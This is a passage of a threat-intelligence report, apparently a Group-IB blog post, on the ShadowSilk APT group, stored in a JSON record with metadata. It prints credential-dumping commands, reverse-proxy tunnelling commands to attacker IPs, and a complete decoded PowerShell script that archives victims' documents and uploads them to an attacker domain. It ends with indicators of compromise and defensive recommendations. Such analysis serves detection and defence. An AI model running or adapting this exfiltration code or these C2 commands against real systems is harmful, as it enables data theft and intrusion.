dpapi::cred\r\ncreds_livessp\r\ncreds_msv\r\ncreds_ssp\r\ncreds_tspkg\r\nlsa_dump_secrets\r\nlsa_dump_sam\r\ncat .bash_history\r\ncat /etc/shadow\r\ncat /home/cert/requestPassword.txt\r\nCommand and Control\r\nAs previously mentioned, the attackers use Telegram-based malware alongside Cobalt Strike and\r\nMetasploit, employing these tools as C2 infrastructure.Furthermore, the attackers downloaded\r\nreverse proxy tools such as rsocx, chisel resocks onto the compromised devices:\r\nexecute -H -f rsocx.exe -a \"-r 179[.]60[.]150[.]151:8000\"\r\n./resocks listen -h\r\n./resocks listen --on '179[.]60[.]150[.]151:443' -p \"179[.]60[.]150[.]151:1099\" -k pppqweo\r\n./resocks listen --on '179[.]60[.]150[.]151:443' -p \"179[.]60[.]150[.]151:1099\" -k aaaabbb\r\n./chisel server -p 1066 --reverse\r\n./chisel server -h -p 1066 --reverse\r\n./chisel server --host 179[.]60[.]150[.]150 -p 1066 --reverse\r\nExfiltration\r\nThe threat actors then launch obfuscated PS-code on a compromised device, which looks like the\r\nfollowing after decoding:\r\nfunction MyBackup {\r\n param (\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 28 of 40\n\n[string]$arch,\r\n [string]$volume,\r\n [datetime]$date,\r\n [Int]$days\r\n )\r\n Add-Type -AssemblyName 'System.IO.Compression.FileSystem'\r\n $zipname = \"$arch[.]zip\"\r\n $list_extension = @('.zip', '.doc', '.docx', '.xls', '.xlsx', '.pdf', '.txt')\r\n $volume +=\":\\\"\r\n if ($volume -eq \"C:\\\") {\r\n $volume = \"C:\\Users\\\"\r\n }\r\n $path = \"C:\\Users\\Public\\Pictures\\Test\"\r\n if (-Not (Test-Path -Path $path)) {\r\n $null = New-Item -path $path -ItemType D\r\n }\r\n \r\n Get-ChildItem -Path $volume -Recurse -File | ForEach-Object {\r\n $file = $_\r\n $ext = $file.Extension.ToLower()\r\n try {\r\n $fileDate = $file.LastWriteTime\r\n if (($date - $fileDate).Days -le $days -and $file.FullName -ne \"$arch[.]zip\" -a\r\n ((Split-Path -Parent $file.FullName) -notlike \"$path*\")) {\r\n $relativePath = $file.FullName\r\n $dest = (Split-Path -Parent $relativePath).Substring($volume.Length)\r\n if (-Not (Test-Path -Path \"$path\\$dest\")) {\r\n $null = New-Item -path \"$path\\$dest\" -ItemType D\r\n }\r\n Copy-Item -Path $relativePath -Destination \"$path\\$dest\"\r\n }\r\n } catch {\r\n continue\r\n }\r\n }\r\n if(Test-Path -Path $zipname){\r\n Remove-Item -Recurse -Force -Confirm:$false -Path $zipname\r\n }\r\n [System.IO.Compression.ZipFile]::CreateFromDirectory($path, $zipname)\r\n Remove-Item -Recurse -Force -Confirm:$false -Path $path\r\n}\r\nfunction Day {\r\n param (\r\n [string]$tempPath,\r\n [datetime]$date\r\n )\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 29 of 40\n\n$filename = Join-Path -Path $tempPath -ChildPath \"ESET.txt\"\r\n if (-Not (Test-Path -Path $filename)) {\r\n Set-Content -Path $filename -Value $date.ToString('yyyy-MM-dd')\r\n return 7\r\n }\r\n try {\r\n $lastDate = [datetime]::ParseExact((Get-Content -Path $filename -Raw).Trim(), 'yyyy\r\n } catch {\r\n $lastDate = $date\r\n }\r\n $time = $date - $lastDate\r\n Set-Content -Path $filename -Value $date.ToString('yyyy-MM-dd')\r\n if ($time.Days -eq 0) {\r\n return 7\r\n }\r\n return $time.Days\r\n}\r\nfunction Main {\r\n $hostname = $env:USERNAME\r\n $domain = $env:COMPUTERNAME\r\n $datetime_now = Get-Date\r\n $arch_list = @()\r\n $tempPath = 'C:\\Users\\Public\\Pictures'\r\n $volumes = Get-PSDrive -PSProvider FileSystem | Where-Object { $_.Used -ne 0 } | Select\r\n $days = Day -tempPath $tempPath -date $datetime_now\r\n foreach ($volume in $volumes) {\r\n try {\r\n $arch_name = Join-Path -Path $tempPath -ChildPath \"${domain}_${hostname}_${volu\r\n $arch_list += $arch_name\r\n MyBackup -arch $arch_name -volume $volume -date $datetime_now -days $days\r\n $zipname = \"$arch_name[.]zip\"\r\n \r\n Add-type -AssemblyName System.Net.Http\r\n Add-type -AssemblyName System.Web\r\n $httpClientHandler = New-Object System.Net.Http.HttpClientHandler\r\n $httpClient = New-Object System.Net.Http.Httpclient $httpClientHandler\r\n $FileStream = [System.IO.FileStream]::new($zipname, [System.IO.FileMode]::Open)\r\n $FileHeader = [System.Net.Http.Headers.ContentDispositionHeaderValue]::new('for\r\n $FileHeader[.]Name = \"zip_file\"\r\n $FileHeader.FileName = (Split-Path $zipname.Substring($tempPath.Length) -leaf)\r\n $FileContent = [System.Net.Http.StreamContent]::new($FileStream)\r\n $FileContent.Headers.ContentDisposition = $FileHeader\r\n $FileContent.Headers.ContentType = [System.Web.MimeMapping]::GetMimeMapping($zi\r\n \r\n $MultipartContent = [System.Net.Http.MultipartFormDataContent]::new()\r\n $MultipartContent.Add($FileContent)\r\n \r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 30 of 40\n\n$httpClient.PostAsync(\"hxxps://pweobmxdlboi[.]com/iufhtyhgyfugj.php\", $Multipar\r\n $FileStream.Dispose()\r\n Remove-Item -Path $zipname -Force -Confirm:$false\r\n } catch {\r\n continue\r\n }\r\n }\r\n}\r\nMain\r\nThis code:\r\nConclusion\r\nGroup-IB’s analysis of the threat actors’ past and ongoing campaigns revealed significant overlaps\r\nbetween ShadowSilk and the YoroTrooper collective. However, the discovery of a distinct toolset,\r\npreviously unidentified infrastructure, and new insights into the group’s profile led to the attribution\r\nof this activity to a separate threat cluster. Recent behavior indicates that the group remains highly\r\nactive, with new victims identified as recently as July. ShadowSilk continues to focus on the\r\ngovernment sector in Central Asia and the broader APAC region, underscoring the importance of\r\nmonitoring its infrastructure to prevent long-term compromise and data exfiltration.\r\nRecommendations\r\nSearches for files on all available drives except C:\\Users\\Public\\Pictures\\Test. Copies only files\r\nwith extensions .zip, .doc, .docx, .xls, .xlsx, .pdf, .txt. Excludes files with ~ at the beginning of the\r\nname and ESET.txt. Takes files modified in the last $days days. Saves a copy in\r\nC:\\Users\\Public\\Pictures\\Test.\r\nCreates a ZIP archive with a backup copy (Deletes the old archive, if it exists. Archives the folder\r\nwith backup files. Deletes temporary files after creating the archive.)\r\nUploads the archive to hxxps://pweobmxdlboi[.]com/iufhtyhgyfugj.php .Deletes the archive after\r\nsending.\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 31 of 40\n\nFrequently Asked Questions\r\nShadowSilk is an advanced persistent threat (APT) group active since at least 2023. Initially linked to\r\nYoroTrooper, the group was later identified as a distinct threat cluster by Group-IB due to its\r\nexpanded toolset, infrastructure, and diverse victim profile.\r\nIt’s important to use email protection measures to prevent initial compromise through spear-phishing emails.\r\nObserve any use of commands and built-in tools that are frequently used for collecting\r\ninformation about the system and files.\r\nCombine strict application control, patching, and high-fidelity MXDR analytics keyed to known\r\nmalware artefacts.\r\nEnsure that your security measures allow for proactive threat hunting in order to identify threats\r\nthat cannot be detected automatically.\r\nKeeping your organization secure requires ongoing vigilance. Utilizing a proprietary solution like\r\nGroup-IB’s Threat Intelligence can enhance your security posture by providing teams with\r\nadvanced insights into emerging cyber threats allowing you to identify potential risks sooner\r\nand implement defenses more proactively.\r\nRegular monitoring of relevant sections of the dark web and data leaks will help keep your finger\r\non the pulse and adequately assess the current state of the organization’s security.\r\nWho is ShadowSilk?\r\narrow_drop_down\r\nWhat is the main motivation of ShadowSilk? arrow_drop_down\r\nIs ShadowSilk connected to YoroTrooper? arrow_drop_down\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 32 of 40\n\nIndicators of Compromise\r\nPanel JLIB \\ Panel JLIB – web-panel—shell\r\nhxxp://141[.]98[.]82[.]198:9942/ 2025-01-09T21:32:44.981482+00:00\r\nhxxp://88[.]214[.]26[.]37:9942/ 2024-07-24T11:21:59.731143+00:00\r\nWhat are ShadowSilk’s main targets? arrow_drop_down\r\nWhat tactics and techniques does ShadowSilk use? arrow_drop_down\r\nWhat are the tools and exploits used by ShadowSilk? arrow_drop_down\r\nWhat languages do the ShadowSilk operators use? arrow_drop_down\r\nHas ShadowSilk sold stolen data? arrow_drop_down\r\nWhat should organizations do if they suspect ShadowSilk\r\nactivity? arrow_drop_down\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 33 of 40\n\nPanel Morf Project – web-panel\r\nhxxp://193[.]124[.]203[.]226:9942/ 2024-09-25T17:59:18.896894+00:00\r\nhxxp://81[.]19[.]136[.]241:9942/ 2024-07-24T09:15:52.812127+00:00\r\nFile indicators\r\n471e1de3e1a7b0506f6492371a687cde4e278ed8\r\nca12e8975097d1591cda08d095d4af09b05da83f\r\nf385da641f2e506766a42dde81bb0fab13f845ee\r\nfbbf624503001a981095356d1bd26bbf206a0df2\r\nbcb1fd11b6b2f5046d4e5e8f714a8968d8a5d91d\r\nded2a5d2a7ebf3af1dc392c1af1e4b31fdc7cabc\r\n0135f8420c61babee43625dbba2a23ef9a12477d\r\n0279a25ee68fc23e91a353fbcd28f71c21e691fc\r\n16bd4dc2befb4f64aaecf74818a347cd1a02c30d\r\n04f2504f7f00f65e001709650affb90a86404e74\r\n5731274d1e7f0131e055ec34530f05ee603ef03b\r\n00bf14e8153778835f95b9255ae1658e37819f8d\r\nc02dd4d05a75e038c633d7d62669f2e1484f4b76\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 34 of 40\n\n55d214fa9aa4d17cdd222f7deb4c5ec7e71ed4be\r\nc805c64a9e22f7ae3dea79f9215c60cdf32d87b8\r\n4d1426c0e04056396f8526a42afbb42f869db85b\r\n4e98b193d5539bf1ded86a6ddea696288f0a1a3e\r\n9f4826cff6196b4a84fd9243fd6e6879c220b274\r\n85bb5a95db5b088b3e2f2c9f308b91d21d81e04d\r\n2cf77e48cf5699aac449c91552804e17edb04a71\r\n97bab01611d34ae97c368bd2c852f155b7286134\r\ndcb2d87b51de33f6d5fe53f777ad678c0af88a68\r\nd840b0b3039be6cce673e6e07da5bd5e76628434\r\n5e6254ebcf8ea518716c6090658b89960f425ab3\r\n84fcc10fef6409c9f50d56bf4f17070b51149841\r\n46bcac8ced15bf5bc1f2d9e463508273da6fa8e8\r\nfb3db25d5dfe21e3c457756b8bd865c560323527\r\n11b0b620d0f0c4269a191d4ad9fd2042fb5e9d6c\r\nb8ddc728483f1fe251d6ab64b401f297d993be39\r\n7006ff7361522f36a25fabd9b91cf755c42c8cd7\r\n488066ea37be17a8103d414c2593c7abb108ae95\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 35 of 40\n\nNetwork indicators\r\ndocument[.]hometowncity[.]cloud\r\npweobmxdlboi[.]com\r\nadm-govuz[.]com\r\ndocument[.]webmailsession[.]com\r\nmailboxdownload[.]com\r\ninbox[.]docworldme[.]com\r\ndocument[.]mailboxarea[.]cloud\r\nauth[.]allcloudindex[.]com\r\nmosreg[.]docworldme[.]com\r\nex[.]wincorpupdates[.]com\r\nmessage[.]mailboxarea[.]cloud\r\nadmin[.]inboxsession[.]info\r\nemails-cloud[.]com\r\nopenpdfllc[.]com\r\nss[.]qwadx[.]com\r\nsss[.]qwadx[.]com\r\n72[.]4[.]43[.]100\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 36 of 40\n\n81[.]19[.]136[.]241\r\n179[.]60[.]150[.]151\r\n5[.]188[.]86[.]233\r\n141[.]98[.]82[.]198\r\n64[.]7[.]198[.]46\r\n65[.]38[.]120[.]38\r\n168[.]100[.]8[.]21\r\n91[.]212[.]89[.]197\r\n88[.]214[.]26[.]37\r\n64[.]7[.]198[.]66\r\n72[.]5[.]43[.]100\r\n193[.]124[.]203[.]226\r\n85[.]209[.]128[.]171\r\n65[.]38[.]121[.]107\r\nMITRE ATT\u0026CK\r\nTactic Technique Procedure\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 37 of 40\n\nActive Scanning\r\n(T1595)\r\nUse of FOFA Shodan Fscan Gob ster Dirsearch\r\nGather Victim Network\r\nInformation (T1590)\r\nGather Victim Network\r\nInformation: IP\r\nAddresses\r\n(T1590.005)\r\nSearch Open\r\nShare this article\r\nFound it interesting? Don't hesitate to share it to wow your friends or colleagues\r\nResources\r\nResearch Hub\r\nSuccess Stories\r\nKnowledge Hub\r\nCertificates\r\nWebinars\r\nProducts\r\nThreat Intelligence\r\nFraud Protection\r\nManaged XDR\r\nAttack Surface Management\r\nDigital Risk Protection\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 38 of 40\n\nPodcasts\r\nTOP Investigations\r\nRansomware Notes\r\nAI Cybersecurity Hub\r\nBusiness Email Protection\r\nCyber Fraud Intelligence\r\nPlatform\r\nUnified Risk Platform\r\nIntegrations\r\nPartners\r\nPartner Program\r\nMSSP and MDR Partner\r\nProgram\r\nTechnology Partners\r\nPartner Locator\r\nCompany\r\nAbout Group-IB\r\nTeam\r\nCERT-GIB\r\nCareers\r\nInternship\r\nAcademic Aliance\r\nSustainability\r\nMedia Center\r\nContact\r\nAPAC: +65 3159 3798\r\nEU \u0026 NA: +31 20 226 90 90\r\nMEA: +971 4 568 1785\r\ninfo@group-ib.com\r\nSubscription plans Services Resource Center\r\nSubscribe to stay up to date with the\r\nlatest cyber threat trends\r\nContact\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 39 of 40\n\n© 2003 – 2026 Group-IB is a global leader in the fight against cybercrime, protecting customers\r\naround the world by preventing breaches, eliminating fraud and protecting brands.\r\nTerms of Use Cookie Policy Privacy Policy\r\nhttps://www.group-ib.com/blog/shadowsilk/\r\nPage 40 of 40",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.group-ib.com/blog/shadowsilk/"
	],
	"report_names": [
		"shadowsilk"
	],
	"threat_actors": [
		{
			"id": "c416152c-d268-40a3-8887-01d2ec452b7c",
			"created_at": "2023-04-27T02:04:45.481771Z",
			"updated_at": "2026-04-10T02:00:04.987067Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Silent Lynx"
			],
			"source_name": "ETDA:YoroTrooper",
			"tools": [
				"Loda",
				"Loda RAT",
				"LodaRAT",
				"Meterpreter",
				"Nymeria",
				"Warzone",
				"Warzone RAT"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "322248d6-4baf-4ada-af8e-074bc6c10132",
			"created_at": "2023-11-05T02:00:08.072145Z",
			"updated_at": "2026-04-10T02:00:03.397406Z",
			"deleted_at": null,
			"main_name": "YoroTrooper",
			"aliases": [
				"Comrade Saiga",
				"Salted Earth",
				"Sturgeon Fisher",
				"ShadowSilk",
				"Silent Lynx",
				"Cavalry Werewolf",
				"SturgeonPhisher"
			],
			"source_name": "MISPGALAXY:YoroTrooper",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434764,
	"ts_updated_at": 1775791525,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.pdf",
		"text": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.txt",
		"img": "https://archive.orkl.eu/d9badf5186a32d32b5796f3838d4202bf3ea32ac.jpg"
	}
}